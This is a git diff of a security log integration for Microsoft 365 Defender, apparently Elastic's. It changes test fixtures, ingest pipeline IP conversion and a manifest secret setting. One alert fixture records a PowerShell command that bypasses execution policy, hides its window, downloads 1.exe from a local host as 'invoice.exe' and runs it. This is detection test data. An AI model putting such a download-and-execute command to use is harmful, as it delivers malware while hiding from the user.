information.\",\"resolvedDateTime\":null,\"serviceSource\":\"microsoftDefenderForEndpoint\",\"severity\":\"medium\",\"status\":\"new\",\"tenantId\":\"3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"threatDisplayName\":null,\"threatFamilyName\":null,\"title\":\"Suspicious PowerShell command line\"}", + "provider": "microsoftDefenderForEndpoint", + "severity": 3, + "start": "2023-10-20T09:51:39.515Z", + "type": [ + "info" + ], + "url": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39" + }, + "host": { + "id": [ + "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843" + ], + "ip": [ + "127.0.0.1" + ], + "os": { + "name": [ + "Windows11" + ], + "version": [ + "22H2" + ] + } + }, + "input": { + "type": "httpjson" + }, + "m365_defender": { + "alert": { + "category": "Execution", + "created_datetime": "2023-10-20T09:53:09.883Z", + "description": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "detection_source": "microsoftDefenderForEndpoint", + "detector_id": "7f1c3609-a3ff-40e2-995b-c01770161d68", + "evidence": [ + { + "azure_ad_device_id": "f18bd540-d5e4-46e0-8ddd-3d03a59e4e14", + "created_datetime": "2023-10-20T09:53:10.193Z", + "defender_av_status": "notSupported", + "detailed_roles": [ + "PrimaryDevice" + ], + "device_dns_name": "clw555test", + "first_seen_datetime": "2023-10-20T09:50:17.738Z", + "health_status": "inactive", + "ip_interfaces": [ + "192.168.5.65", + "fe80::cfe4:80b:615c:38fb", + "127.0.0.1", + "::1" + ], + "logged_on_users": [ + { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD" + } + ], + "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "odata_type": "#microsoft.graph.security.deviceEvidence", + "onboarding_status": "onboarded", + "os_build": "22621", + "os_platform": "Windows11", + "rbac_group": { + "id": "0" + }, + "remediation_status": "none", + "risk_score": "high", + "verdict": "unknown", + "version": "22H2" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "odata_type": "#microsoft.graph.security.userEvidence", + "remediation_status": "none", + "user_account": { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD", + "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + }, + "verdict": "unknown" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "odata_type": "#microsoft.graph.security.urlEvidence", + "remediation_status": "none", + "url": "http://127.0.0.1/1.exe", + "verdict": "suspicious" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "ip_address": "127.0.0.1", + "odata_type": "#microsoft.graph.security.ipEvidence", + "remediation_status": "none", + "verdict": "suspicious" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "detection_status": "detected", + "image_file": { + "name": "powershell.exe", + "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "publisher": "Microsoft Corporation", + "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011", + "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80", + "size": 491520 + }, + "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "odata_type": "#microsoft.graph.security.processEvidence", + "parent_process": { + "creation_datetime": "2023-10-20T09:51:19.506Z", + "id": 5772, + "image_file": { + "name": "cmd.exe", + "path": "C:\\Windows\\System32", + "publisher": "Microsoft Corporation", + "size": 323584 + } + }, + "process": { + "command_line": "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'", + "creation_datetime": "2023-10-20T09:51:39.499Z", + "id": 8224 + }, + "remediation_status": "none", + "user_account": { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD", + "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + }, + "verdict": "unknown" + } + ], + "first_activity_datetime": "2023-10-20T09:51:39.515Z", + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "incident_id": "23", + "incident_web_url": { + "domain": "security.microsoft.com", + "original": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "path": "/incidents/23", + "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "scheme": "https" + }, + "last_activity_datetime": "2023-10-20T09:51:41.993Z", + "last_update_datetime": "2023-10-20T09:54:07.503Z", + "mitre_techniques": [ + "T1059.001" + ], + "provider_alert_id": "efa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "recommended_actions": "1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.", + "service_source": "microsoftDefenderForEndpoint", + "severity": "medium", + "status": "new", + "tenant_id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "title": "Suspicious PowerShell command line", + "web_url": { + "domain": "security.microsoft.com", + "original": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "path": "/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "scheme": "https" + } + } + }, + "message": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "process": { + "command_line": [ + "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'" + ], + "hash": { + "sha1": [ + "a72c41316307889e43fe8605a0dca4a72e72a011" + ], + "sha256": [ + "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80" + ] + }, + "parent": { + "pid": [ + 5772 + ], + "start": [ + "2023-10-20T09:51:19.506Z" + ] + }, + "pid": [ + 8224 + ], + "start": [ + "2023-10-20T09:51:39.499Z" + ], + "user": { + "name": [ + "CDPUserIS-38411" + ] + } + }, + "related": { + "hash": [ + "a72c41316307889e43fe8605a0dca4a72e72a011", + "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80" + ], + "hosts": [ + "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "Windows11", + "22H2", + "clw555test", + "AzureAD" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "CDPUserIS-38411", + "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields", + "forwarded", + "m365_defender-alert" + ], + "threat": { + "tactic": { + "name": [ + "Execution" + ] + }, + "technique": { + "subtechnique": { + "id": [ + "T1059.001" + ] + } + } + }, + "user": { + "domain": [ + "AzureAD" + ], + "name": [ + "CDPUserIS-38411" + ] + } +} \ No newline at end of file diff --git a/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log b/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log index 7ff7c783014..bce3153a453 100644 --- a/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log +++ b/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log @@ -24,3 +24,5 @@ {"Tenant":"DefaultTenant","category":"AdvancedHunting-DeviceNetworkEvents","operationName":"Publish","properties":{"Timestamp": "2023-07-19T14:09:43.8734771Z","DeviceId": "22bb10ffe3104214b20fc7de339a2b053e915e5c","DeviceName": "janeslaptop1.corporatedomain","ActionType": "SmtpConnectionInspected","RemoteIP": "175.16.199.0","RemotePort": 25,"RemoteUrl":null,"LocalIP": "89.160.20.112","LocalPort": 60697,"Protocol": "Tcp","LocalIPType":null,"RemoteIPType":null,"InitiatingProcessSHA1":null,"InitiatingProcessSHA256":null,"InitiatingProcessMD5":null,"InitiatingProcessFileName":null,"InitiatingProcessFileSize":null,"InitiatingProcessVersionInfoCompanyName":null,"InitiatingProcessVersionInfoProductName":null,"InitiatingProcessVersionInfoProductVersion":null,"InitiatingProcessVersionInfoInternalFileName":null,"InitiatingProcessVersionInfoOriginalFileName":null,"InitiatingProcessVersionInfoFileDescription":null,"InitiatingProcessId": 0,"InitiatingProcessCommandLine":null,"InitiatingProcessCreationTime":null,"InitiatingProcessFolderPath":null,"InitiatingProcessParentFileName":null,"InitiatingProcessParentId": 0,"InitiatingProcessParentCreationTime":null,"InitiatingProcessAccountDomain":null,"InitiatingProcessAccountName":null,"InitiatingProcessAccountSid":null,"InitiatingProcessAccountUpn":null,"InitiatingProcessAccountObjectId":null,"InitiatingProcessIntegrityLevel":null,"InitiatingProcessTokenElevation": "None","ReportId": 18984951960,"AppGuardContainerId":null,"AdditionalFields": { "direction": "Out", "fuids": "[]", "helo": "janeslaptop1.corporatedomain", "last_reply": "220 2.0.0 SMTP server ready", "path": "[\"89.160.20.112\",\"89.160.20.112\"]", "tls": "true", "trans_depth": "1", "uid": "0278e28ff5d8eff6d3"}},"tenantId":"12345af3-bc0e-4f36-b08e-27759e912345","time":"2023-07-19T18:03:34.9948950Z"} {"Tenant":"DefaultTenant","category":"AdvancedHunting-DeviceNetworkEvents","operationName":"Publish","properties":{"Timestamp": "2023-07-19T12:12:10.0598052Z","DeviceId": "22bb10ffe3104214b20fc7de339a2b053e915e5c","DeviceName": "janeslaptop1.corporatedomain","ActionType": "FtpConnectionInspected","RemoteIP": "175.16.199.0","RemotePort": 21,"RemoteUrl":null,"LocalIP": "89.160.20.112","LocalPort": 56885,"Protocol": "Tcp","LocalIPType":null,"RemoteIPType":null,"InitiatingProcessSHA1":null,"InitiatingProcessSHA256":null,"InitiatingProcessMD5":null,"InitiatingProcessFileName":null,"InitiatingProcessFileSize":null,"InitiatingProcessVersionInfoCompanyName":null,"InitiatingProcessVersionInfoProductName":null,"InitiatingProcessVersionInfoProductVersion":null,"InitiatingProcessVersionInfoInternalFileName":null,"InitiatingProcessVersionInfoOriginalFileName":null,"InitiatingProcessVersionInfoFileDescription":null,"InitiatingProcessId": 0,"InitiatingProcessCommandLine":null,"InitiatingProcessCreationTime":null,"InitiatingProcessFolderPath":null,"InitiatingProcessParentFileName":null,"InitiatingProcessParentId": 0,"InitiatingProcessParentCreationTime":null,"InitiatingProcessAccountDomain":null,"InitiatingProcessAccountName":null,"InitiatingProcessAccountSid":null,"InitiatingProcessAccountUpn":null,"InitiatingProcessAccountObjectId":null,"InitiatingProcessIntegrityLevel":null,"InitiatingProcessTokenElevation": "None","ReportId": 98498,"AppGuardContainerId":null,"AdditionalFields": { "direction": "Out", "user": "", "reply_msg": "Service ready", "reply_code": "220", "cwd": ".", "command": "", "uid": "603f4dc5c8d46599fd"}},"tenantId":"12345af3-bc0e-4f36-b08e-27759e912345","time":"2023-07-19T18:03:35.9948950Z"} {"Tenant":"DefaultTenant","category":"AdvancedHunting-DeviceProcessEvents","operationName":"Publish","properties":{"Timestamp": "2023-07-19T14:02:19.4882081Z","DeviceId": "22bb10ffe3104214b20fc7de339a2b053e915e5c","DeviceName": "janeslaptop1.corporatedomain","ActionType": "ProcessCreated","FileName": "msedgewebview2.exe","FolderPath": "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\114.0.1823.79\\msedgewebview2.exe","SHA1": "271eb137d3d8519cb42e5bccd690a3b9a3059f2a","SHA256": "075d1edc11548c9ebf7f238dea9393f26c5b83cd0362aa4cc24b1d8a6ebc6354","MD5": "b21b158fce974aa46125820ce6b42e9d","FileSize": 3653056,"ProcessVersionInfoCompanyName": "Microsoft Corporation","ProcessVersionInfoProductName": "Microsoft Edge WebView2","ProcessVersionInfoProductVersion": "114.0.1732.12","ProcessVersionInfoInternalFileName": "msedgewebview2_exe","ProcessVersionInfoOriginalFileName": "msedgewebview2.exe","ProcessVersionInfoFileDescription": "Microsoft Edge WebView2","ProcessId": 5498762,"ProcessCommandLine": "\"msedgewebview2.exe\" --type=renderer --noerrdialogs --user-data-dir=\"C:\\Users\\JANEBLOGGS\\AppData\\Local\\Microsoft\\Office\\16.0\\Wef\\webview2\\4ee9dcb0-735b-442e-945c-177c665efe6b_ADAL\\2\\EBWebView\" --webview-exe-name=MSOUTLOOK.EXE","ProcessIntegrityLevel": "Low","ProcessTokenElevation": "TokenElevationTypeDefault","ProcessCreationTime": "2023-07-19T14:02:19.4882081Z","AccountDomain": "corporatedomain","AccountName": "janebloggs","AccountSid": "S-1-5-21-57989841-2025429265-839522115-962270","AccountUpn": "janebloggs@corporate.com","AccountObjectId": "4ee9dcb0-735b-442e-945c-177c665efe6b","LogonId": 3654987,"InitiatingProcessAccountDomain": "corporatedomain","InitiatingProcessAccountName": "janebloggs","InitiatingProcessAccountSid": "S-1-5-21-57989841-2025429265-839522115-962270","InitiatingProcessAccountUpn": "janebloggs@corporate.com","InitiatingProcessAccountObjectId": "4ee9dcb0-735b-442e-945c-177c665efe6b","InitiatingProcessLogonId": 3654987,"InitiatingProcessIntegrityLevel": "Medium","InitiatingProcessTokenElevation": "TokenElevationTypeDefault","InitiatingProcessSHA1": "271eb137d3d8519cb42e5bccd690a3b9a3059f2a","InitiatingProcessSHA256": "075d1edc11548c9ebf7f238dea9393f26c5b83cd0362aa4cc24b1d8a6ebc6354","InitiatingProcessMD5": "b21b158fce974aa46125820ce6b42e9d","InitiatingProcessFileName": "msedgewebview2.exe","InitiatingProcessFileSize": 5498762,"InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation","InitiatingProcessVersionInfoProductName": "Microsoft Edge WebView2","InitiatingProcessVersionInfoProductVersion": "114.0.1732.12","InitiatingProcessVersionInfoInternalFileName": "msedgewebview2_exe","InitiatingProcessVersionInfoOriginalFileName": "msedgewebview2.exe","InitiatingProcessVersionInfoFileDescription": "Microsoft Edge WebView2","InitiatingProcessId": 65485,"InitiatingProcessCommandLine": "\"msedgewebview2.exe\" --embedded-browser-webview=1 --webview-exe-name=MSOUTLOOK.EXE --webview-exe-version=16.0.15601.20706 --user-data-dir=\"C:\\Users\\USERNAME\\AppData\\Local\\Microsoft\\Office\\16.0\\Wef\\webview2\\1234dcb0-735b-442e-945c-e6c5df94062c_ADAL\\2\\EBWebView\" --noerrdialogs","InitiatingProcessCreationTime":null},"tenantId":"12345af3-bc0e-4f36-b08e-27759e912345","time":"2023-07-19T18:03:21.9948950Z"} +{"Tenant":"DefaultTenant","category":"AdvancedHunting-DeviceNetworkEvents","operationName":"Publish","properties":{"Timestamp": "2023-07-19T14:09:43.8734771Z","DeviceId": "22bb10ffe3104214b20fc7de339a2b053e915e5c","DeviceName": "janeslaptop1.corporatedomain","ActionType": "SmtpConnectionInspected","RemoteIP": "-","RemotePort": 25,"RemoteUrl":null,"LocalIP": "-","LocalPort": 60697,"Protocol": "Tcp","LocalIPType":null,"RemoteIPType":null,"InitiatingProcessSHA1":null,"InitiatingProcessSHA256":null,"InitiatingProcessMD5":null,"InitiatingProcessFileName":null,"InitiatingProcessFileSize":null,"InitiatingProcessVersionInfoCompanyName":null,"InitiatingProcessVersionInfoProductName":null,"InitiatingProcessVersionInfoProductVersion":null,"InitiatingProcessVersionInfoInternalFileName":null,"InitiatingProcessVersionInfoOriginalFileName":null,"InitiatingProcessVersionInfoFileDescription":null,"InitiatingProcessId": 0,"InitiatingProcessCommandLine":null,"InitiatingProcessCreationTime":null,"InitiatingProcessFolderPath":null,"InitiatingProcessParentFileName":null,"InitiatingProcessParentId": 0,"InitiatingProcessParentCreationTime":null,"InitiatingProcessAccountDomain":null,"InitiatingProcessAccountName":null,"InitiatingProcessAccountSid":null,"InitiatingProcessAccountUpn":null,"InitiatingProcessAccountObjectId":null,"InitiatingProcessIntegrityLevel":null,"InitiatingProcessTokenElevation": "None","ReportId": 18984951960,"AppGuardContainerId":null,"AdditionalFields": { "direction": "Out", "fuids": "[]", "helo": "janeslaptop1.corporatedomain", "last_reply": "220 2.0.0 SMTP server ready", "path": "[\"89.160.20.112\",\"89.160.20.112\"]", "tls": "true", "trans_depth": "1", "uid": "0278e28ff5d8eff6d3"}},"tenantId":"12345af3-bc0e-4f36-b08e-27759e912345","time":"2023-07-19T18:03:34.9948950Z"} +{"Tenant":"DefaultTenant","category":"AdvancedHunting-DeviceInfo","operationName":"Publish","properties":{"AadDeviceId":null,"AdditionalFields":null,"AssetValue":"testvalue","IsInternetFacing":true,"DeviceManualTags":"testtags","DeviceDynamicTags":"testdynamictags","ExposureLevel":"testlevel","SensorHealthState":"somestatus","ExclusionReason":"somereason","IsExcluded":false,"ClientVersion":"10.8210.19041.2006","DeviceCategory":"Endpoint","DeviceId":"999b6fd7c532534ba50b3232fa992c38a2712345","DeviceName":"testmachine6","DeviceSubtype":null,"DeviceType":"Workstation","IsAzureADJoined":false,"JoinType":null,"LoggedOnUsers":"[{\"UserName\":\"administrator1\"}, {\"UserName\":\"administrator2\"}]","MachineGroup":"UnassignedGroup","MergedDeviceIds":null,"MergedToDeviceId":null,"Model":null,"OSArchitecture":null,"OSBuild":null,"OSDistribution":null,"OSPlatform":null,"OSVersion":null,"OSVersionInfo":null,"OnboardingStatus":"Onboarded","PublicIP":"-","RegistryDeviceTag":"evaluation","ReportId":12942,"Timestamp":"2022-11-08T05:56:25.8832339Z","Vendor":null},"tenantId":"12345af3-bc0e-4f36-b08e-27759e912345","time":"2022-11-08T06:01:15.8987913Z"} diff --git a/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log-expected.json b/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log-expected.json index d94c774478f..edf9096108c 100644 --- a/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log-expected.json +++ b/packages/m365_defender/data_stream/event/_dev/test/pipeline/test-device.log-expected.json @@ -3440,6 +3440,169 @@ "id": "S-1-5-21-57989841-2025429265-839522115-962270", "name": "janebloggs" } + }, + { + "@timestamp": "2023-07-19T14:09:43.873Z", + "destination": { + "port": 25 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "smtpconnectioninspected", + "category": [ + "network" + ], + "kind": "event", + "original": "{\"Tenant\":\"DefaultTenant\",\"category\":\"AdvancedHunting-DeviceNetworkEvents\",\"operationName\":\"Publish\",\"properties\":{\"Timestamp\": \"2023-07-19T14:09:43.8734771Z\",\"DeviceId\": \"22bb10ffe3104214b20fc7de339a2b053e915e5c\",\"DeviceName\": \"janeslaptop1.corporatedomain\",\"ActionType\": \"SmtpConnectionInspected\",\"RemoteIP\": \"-\",\"RemotePort\": 25,\"RemoteUrl\":null,\"LocalIP\": \"-\",\"LocalPort\": 60697,\"Protocol\": \"Tcp\",\"LocalIPType\":null,\"RemoteIPType\":null,\"InitiatingProcessSHA1\":null,\"InitiatingProcessSHA256\":null,\"InitiatingProcessMD5\":null,\"InitiatingProcessFileName\":null,\"InitiatingProcessFileSize\":null,\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"InitiatingProcessId\": 0,\"InitiatingProcessCommandLine\":null,\"InitiatingProcessCreationTime\":null,\"InitiatingProcessFolderPath\":null,\"InitiatingProcessParentFileName\":null,\"InitiatingProcessParentId\": 0,\"InitiatingProcessParentCreationTime\":null,\"InitiatingProcessAccountDomain\":null,\"InitiatingProcessAccountName\":null,\"InitiatingProcessAccountSid\":null,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"InitiatingProcessIntegrityLevel\":null,\"InitiatingProcessTokenElevation\": \"None\",\"ReportId\": 18984951960,\"AppGuardContainerId\":null,\"AdditionalFields\": { \"direction\": \"Out\", \"fuids\": \"[]\", \"helo\": \"janeslaptop1.corporatedomain\", \"last_reply\": \"220 2.0.0 SMTP server ready\", \"path\": \"[\\\"89.160.20.112\\\",\\\"89.160.20.112\\\"]\", \"tls\": \"true\", \"trans_depth\": \"1\", \"uid\": \"0278e28ff5d8eff6d3\"}},\"tenantId\":\"12345af3-bc0e-4f36-b08e-27759e912345\",\"time\":\"2023-07-19T18:03:34.9948950Z\"}" + }, + "host": { + "id": "22bb10ffe3104214b20fc7de339a2b053e915e5c", + "name": "janeslaptop1.corporatedomain" + }, + "m365_defender": { + "event": { + "action": { + "type": "SmtpConnectionInspected" + }, + "additional_fields": { + "fuids": "[]", + "helo": "janeslaptop1.corporatedomain", + "last_reply": "220 2.0.0 SMTP server ready", + "path": "[\"89.160.20.112\",\"89.160.20.112\"]", + "tls": "true", + "trans_depth": "1", + "uid": "0278e28ff5d8eff6d3" + }, + "category": "AdvancedHunting-DeviceNetworkEvents", + "device": { + "id": "22bb10ffe3104214b20fc7de339a2b053e915e5c", + "name": "janeslaptop1.corporatedomain" + }, + "initiating_process": { + "id": 0, + "parent_id": 0, + "token_elevation": "None" + }, + "local": { + "port": 60697 + }, + "network_direction": "Out", + "operation_name": "Publish", + "protocol": "Tcp", + "remote": { + "port": 25 + }, + "report_id": "18984951960", + "tenant": { + "id": "12345af3-bc0e-4f36-b08e-27759e912345", + "name": "DefaultTenant" + }, + "time": "2023-07-19T18:03:34.994Z", + "timestamp": "2023-07-19T14:09:43.873Z" + } + }, + "network": { + "direction": "outbound", + "protocol": "tcp" + }, + "process": { + "parent": { + "pid": 0 + }, + "pid": 0 + }, + "related": { + "hosts": [ + "22bb10ffe3104214b20fc7de339a2b053e915e5c", + "janeslaptop1.corporatedomain" + ] + }, + "source": { + "port": 60697 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2022-11-08T05:56:25.883Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "host" + ], + "kind": "event", + "original": "{\"Tenant\":\"DefaultTenant\",\"category\":\"AdvancedHunting-DeviceInfo\",\"operationName\":\"Publish\",\"properties\":{\"AadDeviceId\":null,\"AdditionalFields\":null,\"AssetValue\":\"testvalue\",\"IsInternetFacing\":true,\"DeviceManualTags\":\"testtags\",\"DeviceDynamicTags\":\"testdynamictags\",\"ExposureLevel\":\"testlevel\",\"SensorHealthState\":\"somestatus\",\"ExclusionReason\":\"somereason\",\"IsExcluded\":false,\"ClientVersion\":\"10.8210.19041.2006\",\"DeviceCategory\":\"Endpoint\",\"DeviceId\":\"999b6fd7c532534ba50b3232fa992c38a2712345\",\"DeviceName\":\"testmachine6\",\"DeviceSubtype\":null,\"DeviceType\":\"Workstation\",\"IsAzureADJoined\":false,\"JoinType\":null,\"LoggedOnUsers\":\"[{\\\"UserName\\\":\\\"administrator1\\\"}, {\\\"UserName\\\":\\\"administrator2\\\"}]\",\"MachineGroup\":\"UnassignedGroup\",\"MergedDeviceIds\":null,\"MergedToDeviceId\":null,\"Model\":null,\"OSArchitecture\":null,\"OSBuild\":null,\"OSDistribution\":null,\"OSPlatform\":null,\"OSVersion\":null,\"OSVersionInfo\":null,\"OnboardingStatus\":\"Onboarded\",\"PublicIP\":\"-\",\"RegistryDeviceTag\":\"evaluation\",\"ReportId\":12942,\"Timestamp\":\"2022-11-08T05:56:25.8832339Z\",\"Vendor\":null},\"tenantId\":\"12345af3-bc0e-4f36-b08e-27759e912345\",\"time\":\"2022-11-08T06:01:15.8987913Z\"}", + "type": [ + "info" + ] + }, + "host": { + "id": "999b6fd7c532534ba50b3232fa992c38a2712345", + "name": "testmachine6", + "type": "Workstation" + }, + "m365_defender": { + "event": { + "active_users": [ + "administrator1", + "administrator2" + ], + "asset_value": "testvalue", + "category": "AdvancedHunting-DeviceInfo", + "client_version": "10.8210.19041.2006", + "device": { + "category": "Endpoint", + "id": "999b6fd7c532534ba50b3232fa992c38a2712345", + "name": "testmachine6", + "type": "Workstation" + }, + "device_dynamic_tags": "testdynamictags", + "device_manual_tags": "testtags", + "exclusion_reason": "somereason", + "exposure_level": "testlevel", + "is_azure_ad_joined": false, + "is_excluded": false, + "is_internet_facing": true, + "machine_group": "UnassignedGroup", + "onboarding_status": "Onboarded", + "operation_name": "Publish", + "registry": { + "device_tag": "evaluation" + }, + "report_id": "12942", + "sensor_health_state": "somestatus", + "tenant": { + "id": "12345af3-bc0e-4f36-b08e-27759e912345", + "name": "DefaultTenant" + }, + "time": "2022-11-08T06:01:15.898Z", + "timestamp": "2022-11-08T05:56:25.883Z" + } + }, + "observer": { + "type": "Endpoint", + "version": "10.8210.19041.2006" + }, + "related": { + "hosts": [ + "999b6fd7c532534ba50b3232fa992c38a2712345", + "testmachine6" + ], + "user": [ + "administrator1", + "administrator2" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] } ] } \ No newline at end of file diff --git a/packages/m365_defender/data_stream/event/elasticsearch/ingest_pipeline/pipeline_device.yml b/packages/m365_defender/data_stream/event/elasticsearch/ingest_pipeline/pipeline_device.yml index 2b94e0a1918..932a811688b 100644 --- a/packages/m365_defender/data_stream/event/elasticsearch/ingest_pipeline/pipeline_device.yml +++ b/packages/m365_defender/data_stream/event/elasticsearch/ingest_pipeline/pipeline_device.yml @@ -920,21 +920,53 @@ processors: target_field: m365_defender.event.previous.registry_value_name tag: rename_json_properties_PreviousRegistryValueName ignore_missing: true + - convert: + field: json.properties.FileOriginIP + type: ip + tag: convert_file_origin_ip + if: ctx.json?.properties?.FileOriginIP != null + on_failure: + - remove: + field: json.properties.FileOriginIP - rename: field: json.properties.FileOriginIP target_field: m365_defender.event.file.origin_ip tag: rename_json_properties_FileOriginIp ignore_missing: true + - convert: + field: json.properties.RemoteIP + type: ip + tag: convert_remote_ip + if: ctx.json?.properties?.RemoteIP != null + on_failure: + - remove: + field: json.properties.RemoteIP - rename: field: json.properties.RemoteIP target_field: m365_defender.event.remote.ip tag: rename_json_properties_RemoteIP ignore_missing: true + - convert: + field: json.properties.LocalIP + type: ip + tag: convert_local_ip + if: ctx.json?.properties?.LocalIP != null + on_failure: + - remove: + field: json.properties.LocalIP - rename: field: json.properties.LocalIP target_field: m365_defender.event.local.ip tag: rename_json_properties_LocalIP ignore_missing: true + - convert: + field: json.properties.RequestSourceIP + type: ip + tag: convert_request_source_ip + if: ctx.json?.properties?.RequestSourceIP != null + on_failure: + - remove: + field: json.properties.RequestSourceIP - rename: field: json.properties.RequestSourceIP target_field: m365_defender.event.request.source_ip @@ -955,6 +987,14 @@ processors: target_field: m365_defender.event.local.port tag: rename_json_properties_LocalPort ignore_missing: true + - convert: + field: json.properties.PublicIP + type: ip + tag: convert_public_ip + if: ctx.json?.properties?.PublicIP != null + on_failure: + - remove: + field: json.properties.PublicIP - rename: field: json.properties.PublicIP target_field: m365_defender.event.public_ip.value @@ -1704,18 +1744,17 @@ processors: def commandLine = ctx.process.command_line; commandLine = commandLine.trim(); if (commandLine != "") { - ctx.process.command_line = commandLine; - - def args = new ArrayList(); - for (def v : / /.split(commandLine)) { - if (v != "") { - args.add(v); - } - } - if (args.length > 0) { - ctx.process.args = args; - ctx.process.args_count = args.length; - } + ctx.process.command_line = commandLine; + def args = new ArrayList(); + for (def v : / /.split(commandLine)) { + if (v != "") { + args.add(v); + } + } + if (args.length > 0) { + ctx.process.args = args; + ctx.process.args_count = args.length; + } } - script: description: Splits up the command line to populate more parent processor fields. @@ -1726,18 +1765,17 @@ processors: def commandLine = ctx.process.parent.command_line; commandLine = commandLine.trim(); if (commandLine != "") { - ctx.process.parent.command_line = commandLine; - - def args = new ArrayList(); - for (def v : / /.split(commandLine)) { - if (v != "") { - args.add(v); - } - } - if (args.length > 0) { - ctx.process.parent.args = args; - ctx.process.parent.args_count = args.length; - } + ctx.process.parent.command_line = commandLine; + def args = new ArrayList(); + for (def v : / /.split(commandLine)) { + if (v != "") { + args.add(v); + } + } + if (args.length > 0) { + ctx.process.parent.args = args; + ctx.process.parent.args_count = args.length; + } } # Geo mapping diff --git a/packages/m365_defender/data_stream/event/manifest.yml b/packages/m365_defender/data_stream/event/manifest.yml index 0f76dc9502d..03f55dc777a 100644 --- a/packages/m365_defender/data_stream/event/manifest.yml +++ b/packages/m365_defender/data_stream/event/manifest.yml @@ -40,13 +40,14 @@ streams: description: >- The name of the storage account where the consumer group's state/offsets will be stored and updated. - name: storage_account_key - type: text + type: password title: Storage Account Key multi: false required: true show_user: true description: >- The storage account key, this key will be used to authorize access to data in your storage account. + secret: true - name: storage_account_container type: text title: Storage Account Container diff --git a/packages/m365_defender/data_stream/incident/_dev/test/pipeline/test-incident.log-expected.json b/packages/m365_defender/data_stream/incident/_dev/test/pipeline/test-incident.log-expected.json index ee2bcf5acdc..7997aad91bb 100644 --- a/packages/m365_defender/data_stream/incident/_dev/test/pipeline/test-incident.log-expected.json +++ b/packages/m365_defender/data_stream/incident/_dev/test/pipeline/test-incident.log-expected.json @@ -708,12 +708,10 @@ "created_datetime": "2023-05-15T02:37:41.810Z", 